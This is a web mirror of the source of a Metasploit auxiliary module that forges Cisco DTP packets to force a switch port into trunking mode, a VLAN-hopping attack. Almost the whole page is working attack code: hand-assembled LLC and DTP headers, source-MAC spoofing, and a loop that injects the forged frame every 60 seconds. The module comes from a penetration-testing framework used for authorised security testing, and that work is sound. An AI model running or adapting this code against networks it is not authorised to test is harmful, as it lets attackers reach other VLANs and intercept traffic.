Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/spoof/cisco/dtp.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Capture

8


9
  def initialize(_info = {})

10
    super(

11
      'Name' => 'Forge Cisco DTP Packets',

12
      'Description'	=> %q{

13
        This module forges DTP packets to initialize a trunk port.

14
      },

15
      'Author'	=> [ 'Spencer McIntyre' ],

16
      'License'	=> MSF_LICENSE,

17
      'Actions' => [

18
        [ 'Service', { 'Description' => 'Run DTP forging service' } ]

19
      ],

20
      'PassiveActions' => [ 'Service' ],

21
      'DefaultAction' => 'Service',

22
      'Notes' => {

23
        'Stability' => [OS_RESOURCE_LOSS],

24
        'SideEffects' => [IOC_IN_LOGS],

25
        'Reliability' => []

26
      }

27
    )

28
    register_options(

29
      [

30
        OptString.new('SMAC',	[false, 'The spoofed mac (if unset, derived from netifaces)']),

31
      ]

32
    )

33
    deregister_options('RHOST', 'PCAPFILE')

34
  end

35


36
  def setup

37
    super

38
    unless datastore['SMAC'] || datastore['INTERFACE']

39
      raise ArgumentError, 'Must specify SMAC or INTERFACE'

40
    end

41
  end

42


43
  def build_dtp_frame

44
    p = PacketFu::EthPacket.new

45
    p.eth_daddr = '01:00:0c:cc:cc:cc'

46
    p.eth_saddr = smac

47
    llc_hdr =	"\xaa\xaa\x03\x00\x00\x0c\x20\x04"

48
    dtp_hdr =	"\x01"	# version

49
    dtp_hdr <<	"\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00"	# domain

50
    dtp_hdr <<	"\x00\x02\x00\x05\x03"						# status

51
    dtp_hdr <<	"\x00\x03\x00\x05\x45"						# dtp type

52
    dtp_hdr <<	"\x00\x04\x00\x0a" << PacketFu::EthHeader.mac2str(smac)	# neighbor

53
    p.eth_proto = llc_hdr.length + dtp_hdr.length

54
    p.payload = llc_hdr << dtp_hdr

55
    p

56
  end

57


58
  def is_mac?(mac)

59
    !!(mac =~ /^([a-fA-F0-9]{2}:){5}[a-fA-F0-9]{2}$/)

60
  end

61


62
  def smac

63
    @spoof_mac ||= datastore['SMAC']

64
    @spoof_mac ||= get_mac(datastore['INTERFACE']) if netifaces_implemented?

65
    return @spoof_mac

66
  end

67


68
  def run

69
    unless smac

70
      print_error('Source MAC (SMAC) should be defined')

71
      return

72
    end

73


74
    unless is_mac?(smac)

75
      print_error("Source MAC (SMAC) `#{smac}' is badly formatted.")

76
      return

77
    end

78


79
    print_status 'Starting DTP spoofing service...'

80
    open_pcap({ 'FILTER' => 'ether host 01:00:0c:cc:cc:cc' })

81
    datastore['INTERFACE'] || Pcap.lookupdev

82
    dtp = build_dtp_frame

83
    @run = true

84


85
    while @run

86
      capture.inject(dtp.to_s)

87
      select(nil, nil, nil, 60)

88
    end

89


90
    close_pcap

91
  end

92
end

93


94